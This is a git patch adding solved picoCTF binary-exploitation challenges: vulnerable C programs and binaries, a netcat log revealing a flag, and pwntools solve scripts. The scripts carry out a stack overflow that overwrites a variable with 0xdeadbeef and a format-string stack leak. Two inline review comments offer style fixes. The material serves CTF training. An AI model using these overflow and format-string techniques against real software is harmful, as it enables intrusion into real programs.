From 532e0931224d10771334e1c0d6e04dc50654c9b6 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Sun, 1 Sep 2024 22:01:27 +0200 Subject: [PATCH] pwn: add already solved challenges --- pwn/basic_file_exploit/netcat.log | 21 +++ pwn/basic_file_exploit/program-redacted.c | 195 ++++++++++++++++++++++ pwn/buffer_overflow_0/flag.txt | 1 + pwn/buffer_overflow_0/solve.sh | 3 + pwn/buffer_overflow_0/vuln | Bin 0 -> 16016 bytes pwn/buffer_overflow_0/vuln.c | 44 +++++ pwn/clutter_overflow/chall | Bin 0 -> 12704 bytes pwn/clutter_overflow/chall.c | 54 ++++++ pwn/clutter_overflow/flag.txt | 1 + pwn/clutter_overflow/solve.py | 31 ++++ pwn/cve_xxxx_xxxx/flag.txt | 1 + pwn/stonks/solve.py | 43 +++++ pwn/stonks/vuln.c | 148 ++++++++++++++++ 13 files changed, 542 insertions(+) create mode 100644 pwn/basic_file_exploit/netcat.log create mode 100644 pwn/basic_file_exploit/program-redacted.c create mode 100644 pwn/buffer_overflow_0/flag.txt create mode 100755 pwn/buffer_overflow_0/solve.sh create mode 100755 pwn/buffer_overflow_0/vuln create mode 100644 pwn/buffer_overflow_0/vuln.c create mode 100755 pwn/clutter_overflow/chall create mode 100644 pwn/clutter_overflow/chall.c create mode 100644 pwn/clutter_overflow/flag.txt create mode 100755 pwn/clutter_overflow/solve.py create mode 100644 pwn/cve_xxxx_xxxx/flag.txt create mode 100755 pwn/stonks/solve.py create mode 100644 pwn/stonks/vuln.c diff --git a/pwn/basic_file_exploit/netcat.log b/pwn/basic_file_exploit/netcat.log new file mode 100644 index 0000000..9fd7e40 --- /dev/null +++ b/pwn/basic_file_exploit/netcat.log 
@@ -0,0 +1,21 @@
+$ nc saturn.picoctf.net 51109
+Hi, welcome to my echo chamber!
+Type '1' to enter a phrase into our database
+Type '2' to echo a phrase in our database
+Type '3' to exit the program
+1
+1
+Please enter your data:
+asdf
+asdf
+Please enter the length of your data:
+4
+4
+Your entry number is: 1
+Write successful, would you like to do anything else?
+2
+2
+Please enter the entry number of your data:
+0
+0
+picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_E0394EC0}
diff --git a/pwn/basic_file_exploit/program-redacted.c b/pwn/basic_file_exploit/program-redacted.c
new file mode 100644
index 0000000..ad40974
--- /dev/null
+++ b/pwn/basic_file_exploit/program-redacted.c
@@ -0,0 +1,195 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define WAIT 60 + + +static const char* flag = "[REDACTED]"; + +static char data[10][100]; +static int input_lengths[10]; +static int inputs = 0; + + + +int tgetinput(char *input, unsigned int l) +{ + fd_set input_set; + struct timeval timeout; + int ready_for_reading = 0; + int read_bytes = 0; + + if( l <= 0 ) + { + printf("'l' for tgetinput must be greater than 0\n"); + return -2; + } + + + /* Empty the FD Set */ + FD_ZERO(&input_set ); + /* Listen to the input descriptor */ + FD_SET(STDIN_FILENO, &input_set); + + /* Waiting for some seconds */ + timeout.tv_sec = WAIT; // WAIT seconds + timeout.tv_usec = 0; // 0 milliseconds + + /* Listening for input stream for any activity */ + ready_for_reading = select(1, &input_set, NULL, NULL, &timeout); + /* Here, first parameter is number of FDs in the set, + * second is our FD set for reading, + * third is the FD set in which any write activity needs to updated, + * which is not required in this case. + * Fourth is timeout + */ + + if (ready_for_reading == -1) { + /* Some error has occured in input */ + printf("Unable to read your input\n"); + return -1; + } + + if (ready_for_reading) { + read_bytes = read(0, input, l-1); + if(input[read_bytes-1]=='\n'){ + --read_bytes; + input[read_bytes]='\0'; + } + if(read_bytes==0){ + printf("No data given.\n"); + return -4; + } else { + return 0; + } + } else { + printf("Timed out waiting for user input. 
Press Ctrl-C to disconnect\n"); + return -3; + } + + return 0; +} + + +static void data_write() { + char input[100]; + char len[4]; + long length; + int r; + + printf("Please enter your data:\n"); + r = tgetinput(input, 100); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + while (true) { + printf("Please enter the length of your data:\n"); + r = tgetinput(len, 4); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((length = strtol(len, NULL, 10)) == 0) { + puts("Please put in a valid length"); + } else { + break; + } + } + + if (inputs > 10) { + inputs = 0; + } + + strcpy(data[inputs], input); + input_lengths[inputs] = length; + + printf("Your entry number is: %d\n", inputs + 1); + inputs++; +} + + +static void data_read() { + char entry[4]; + long entry_number; + char output[100]; + int r; + + memset(output, '\0', 100); + + printf("Please enter the entry number of your data:\n"); + r = tgetinput(entry, 4); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((entry_number = strtol(entry, NULL, 10)) == 0) { + puts(flag); + fseek(stdin, 0, SEEK_END); + exit(0); + } + + entry_number--; + strncpy(output, data[entry_number], input_lengths[entry_number]); + puts(output); +} + + +int main(int argc, char** argv) { + char input[3] = {'\0'}; + long command; + int r; + + puts("Hi, welcome to my echo chamber!"); + puts("Type '1' to enter a phrase into our database"); + puts("Type '2' to echo a phrase in our database"); + puts("Type '3' to exit the program"); + + while (true) { + r = tgetinput(input, 3); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((command = strtol(input, NULL, 10)) == 0) { + puts("Please put in a valid number"); + } else if (command == 1) { + data_write(); + puts("Write successful, would you like to do anything else?"); + } else if (command == 2) { + if (inputs == 0) { + puts("No data yet"); + 
continue; + } + data_read(); + puts("Read successful, would you like to do anything else?"); + } else if (command == 3) { + return 0; + } else { + puts("Please type either 1, 2 or 3"); + puts("Maybe breaking boundaries elsewhere will be helpful"); + } + } + + return 0; +} diff --git a/pwn/buffer_overflow_0/flag.txt b/pwn/buffer_overflow_0/flag.txt new file mode 100644 index 0000000..4944a4b --- /dev/null +++ b/pwn/buffer_overflow_0/flag.txt @@ -0,0 +1 @@ +flag{FAKEFLAG} diff --git a/pwn/buffer_overflow_0/solve.sh b/pwn/buffer_overflow_0/solve.sh new file mode 100755 index 0000000..defe7bf --- /dev/null +++ b/pwn/buffer_overflow_0/solve.sh @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" | nc saturn.picoctf.net 65443 
diff --git a/pwn/buffer_overflow_0/vuln b/pwn/buffer_overflow_0/vuln new file mode 100755 index 0000000000000000000000000000000000000000..e4e63e14afea88a0d1c6f3c8215cddff4b735005 GIT binary patch literal 16016 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 nUIL6ulGjlU$+65j9WuWLf36JrB4KzG**&}% +#include +#include +#include + +#define FLAGSIZE_MAX 64 + +char flag[FLAGSIZE_MAX]; + +void sigsegv_handler(int sig) { + printf("%s\n", flag); + fflush(stdout); + exit(1); +} + +void vuln(char *input){ + char buf2[16]; + strcpy(buf2, input); +} + +int main(int argc, char **argv){ + + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(flag,FLAGSIZE_MAX,f); + signal(SIGSEGV, sigsegv_handler); // Set up signal handler + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + + printf("Input: "); + 
fflush(stdout); + char buf1[100]; + gets(buf1); + vuln(buf1); + printf("The program will exit now\n"); + return 0; +} 
diff --git a/pwn/clutter_overflow/chall b/pwn/clutter_overflow/chall new file mode 100755 index 0000000000000000000000000000000000000000..c37dc1d37638a598eb6334e83065bb89f18c9005 GIT binary patch literal 12704 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 gpxC8_x^I^JVUKfamvmP_p`880D)4~Ez$3E%0Ap%4B>(^b literal 0 HcmV?d00001 diff --git a/pwn/clutter_overflow/chall.c b/pwn/clutter_overflow/chall.c new file mode 100644 index 0000000..a5c070f --- /dev/null +++ b/pwn/clutter_overflow/chall.c 
@@ -0,0 +1,54 @@ +#include +#include + +#define SIZE 0x100 +#define GOAL 0xdeadbeef + +const char* HEADER = +" ______________________________________________________________________\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ / \\^ ^ |\n" +"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ / \\ ^ _ ^ / | | \\^ ^|\n" +"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | // | /_\\ ^| | ____ ____ | | ^ |\n" +"|^ =|= ^ =================^ ^=|=^| |^=|=^ | | {____}{____} | |^ ^|\n" +"| ^ ^ ^ ^ | ========= |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n" +"|^ ^ ^ ^ ^| / ( \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/ %%%%%%%%%%%%%% \\|^ ^|\n" +".-----. ^ || ) ||^ ^.-------.-------.^| %%%%%%%%%%%%%%%% | ^ |\n" +"| |^ ^|| o ) ( o || ^ | | | | /||||||||||||||||\\ |^ ^|\n" +"| ___ | ^ || | ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n" +"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|== =====\n" +"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n" +"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""; + +int main(void) +{ + long code = 0; + char clutter[SIZE]; + + setbuf(stdout, NULL); + setbuf(stdin, NULL); + setbuf(stderr, NULL); + + puts(HEADER); + puts("My room is so cluttered..."); + 
puts("What do you see?"); + + gets(clutter); + + + if (code == GOAL) { + printf("code == 0x%llx: how did that happen??\n", GOAL); + puts("take a flag for your troubles"); + system("cat flag.txt"); + } else { + printf("code == 0x%llx\n", code); + printf("code != 0x%llx :(\n", GOAL); + } + + return 0; +} diff --git a/pwn/clutter_overflow/flag.txt b/pwn/clutter_overflow/flag.txt new file mode 100644 index 0000000..4944a4b --- /dev/null +++ b/pwn/clutter_overflow/flag.txt @@ -0,0 +1 @@ +flag{FAKEFLAG} diff --git a/pwn/clutter_overflow/solve.py b/pwn/clutter_overflow/solve.py new file mode 100755 index 0000000..2a489b4 --- /dev/null +++ b/pwn/clutter_overflow/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("chall") + +context.binary = exe + + +def conn(): + if args.LOCAL: + r = process([exe.path]) + if args.DEBUG: + gdb.attach(r) + else: + r = remote("mars.picoctf.net", 31890) + + return r + + +def main(): + r = conn() + # gdb.attach(r, 'break *main+143') + print(r.recvuntil(b'What do you see?\n')) + r.sendline((b'A' * 264) + p64(0xdeadbeef)) + print(r.recvall().decode()) + + +if __name__ == "__main__": + main() diff --git a/pwn/cve_xxxx_xxxx/flag.txt b/pwn/cve_xxxx_xxxx/flag.txt new file mode 100644 index 0000000..c8eaedd --- /dev/null +++ b/pwn/cve_xxxx_xxxx/flag.txt @@ -0,0 +1 @@ +CVE-2021-34527 diff --git a/pwn/stonks/solve.py b/pwn/stonks/solve.py new file mode 100755 index 0000000..b3312e5 --- /dev/null +++ b/pwn/stonks/solve.py 
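Review bot: The payload offset `264` in main's `r.sendline((b'A' * 264) + p64(0xdeadbeef))` in clutter_overflow/solve.py is an undocumented magic number, so a later reader has to rediscover how it was derived. Name it and record the derivation next to it, e.g. `OFFSET = 0x100 + 8  # SIZE bytes of clutter[] plus padding up to code (see chall.c)`, noting that the padding part is compiler-chosen stack layout and presumably came from a debugger rather than the source, so it should be re-verified if the binary is rebuilt. The commented-out `gdb.attach(r, 'break *main+143')` line is dead code; either fold it into the `args.DEBUG` branch of `conn()` or drop it. The tube returned by `conn()` is also never closed; a `r.close()` after the final print keeps the script tidy.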
@@ -0,0 +1,43 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p python3 python3Packages.pwntools + +from pwn import * + +ADDR = "mercury.picoctf.net 59616" +HOST, PORT = ADDR.split(" ") + +def main(): + for x in range(1,2): + r = remote(HOST, PORT) + r.recvline() + r.recvline() + r.recvline() + r.recvline() + r.recvline() + r.sendline(b'1') + r.recvline() + r.recvline() + r.recvline() + + # r.sendline(f'%{x}$s'.encode()) + # print(f'%{x}$s'.encode()) + r.sendline(b"%x." * 99 + b"%x") + r.recvline() + result = r.recvline() + print(result) + unpacked = [] + for x in result.strip().split(b"."): + x = int(x, 16) + print(x) + unpacked.extend([ + (x & 0x000000FF), + (x & 0x0000FF00) >> 8, + (x & 0x00FF0000) >> 16, + (x & 0xFF000000) >> 24, + ]) + for x in unpacked: + if x >= ord('!') and x <= ord('~'): + print(chr(x), end='') + +if __name__ == "__main__": + main() diff --git a/pwn/stonks/vuln.c b/pwn/stonks/vuln.c new file mode 100644 index 0000000..5b385a2 --- /dev/null +++ b/pwn/stonks/vuln.c 
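Review bot: The outer `for x in range(1, 2)` in main runs exactly once and its loop variable is immediately shadowed by the two inner `for x in ...` loops, so it is dead scaffolding left over from the commented-out `%{x}$s` probing. Drop the outer loop, or give the inner loops distinct names such as `word` and `byte`, so the control flow matches what the script actually does. The connection is never closed; add `r.close()` after the output loop. `PORT` is still a string after `ADDR.split(" ")`; passing `int(PORT)` to `remote` makes the intent explicit whether or not pwntools coerces it.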
@@ -0,0 +1,148 @@ +#include +#include +#include +#include + +#define FLAG_BUFFER 128 +#define MAX_SYM_LEN 4 + +typedef struct Stonks { + int shares; + char symbol[MAX_SYM_LEN + 1]; + struct Stonks *next; +} Stonk; + +typedef struct Portfolios { + int money; + Stonk *head; +} Portfolio; + +int view_portfolio(Portfolio *p) { + if (!p) { + return 1; + } + printf("\nPortfolio as of "); + fflush(stdout); + system("date"); // TODO: implement this in C + fflush(stdout); + + printf("\n\n"); + Stonk *head = p->head; + if (!head) { + printf("You don't own any stonks!\n"); + } + while (head) { + printf("%d shares of %s\n", head->shares, head->symbol); + head = head->next; + } + return 0; +} + +Stonk *pick_symbol_with_AI(int shares) { + if (shares < 1) { + return NULL; + } + Stonk *stonk = malloc(sizeof(Stonk)); + stonk->shares = shares; + + int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1; + for (int i = 0; i <= MAX_SYM_LEN; i++) { + if (i < AI_symbol_len) { + stonk->symbol[i] = 'A' + (rand() % 26); + } else { + stonk->symbol[i] = '\0'; + } + } + + stonk->next = NULL; + + return stonk; +} + +int buy_stonks(Portfolio *p) { + if (!p) { + return 1; + } + char api_buf[FLAG_BUFFER]; + FILE *f = fopen("api","r"); + if (!f) { + printf("Flag file not found. 
Contact an admin.\n"); + exit(1); + } + fgets(api_buf, FLAG_BUFFER, f); + + int money = p->money; + int shares = 0; + Stonk *temp = NULL; + printf("Using patented AI algorithms to buy stonks\n"); + while (money > 0) { + shares = (rand() % money) + 1; + temp = pick_symbol_with_AI(shares); + temp->next = p->head; + p->head = temp; + money -= shares; + } + printf("Stonks chosen\n"); + + // TODO: Figure out how to read token from file, for now just ask + + char *user_buf = malloc(300 + 1); + printf("What is your API token?\n"); + scanf("%300s", user_buf); + printf("Buying stonks with token:\n"); + printf(user_buf); + + // TODO: Actually use key to interact with API + + view_portfolio(p); + + return 0; +} + +Portfolio *initialize_portfolio() { + Portfolio *p = malloc(sizeof(Portfolio)); + p->money = (rand() % 2018) + 1; + p->head = NULL; + return p; +} + +void free_portfolio(Portfolio *p) { + Stonk *current = p->head; + Stonk *next = NULL; + while (current) { + next = current->next; + free(current); + current = next; + } + free(p); +} + +int main(int argc, char *argv[]) +{ + setbuf(stdout, NULL); + srand(time(NULL)); + Portfolio *p = initialize_portfolio(); + if (!p) { + printf("Memory failure\n"); + exit(1); + } + + int resp = 0; + + printf("Welcome back to the trading app!\n\n"); + printf("What would you like to do?\n"); + printf("1) Buy some stonks!\n"); + printf("2) View my portfolio\n"); + scanf("%d", &resp); + + if (resp == 1) { + buy_stonks(p); + } else if (resp == 2) { + view_portfolio(p); + } + + free_portfolio(p); + printf("Goodbye!\n"); + + exit(0); +}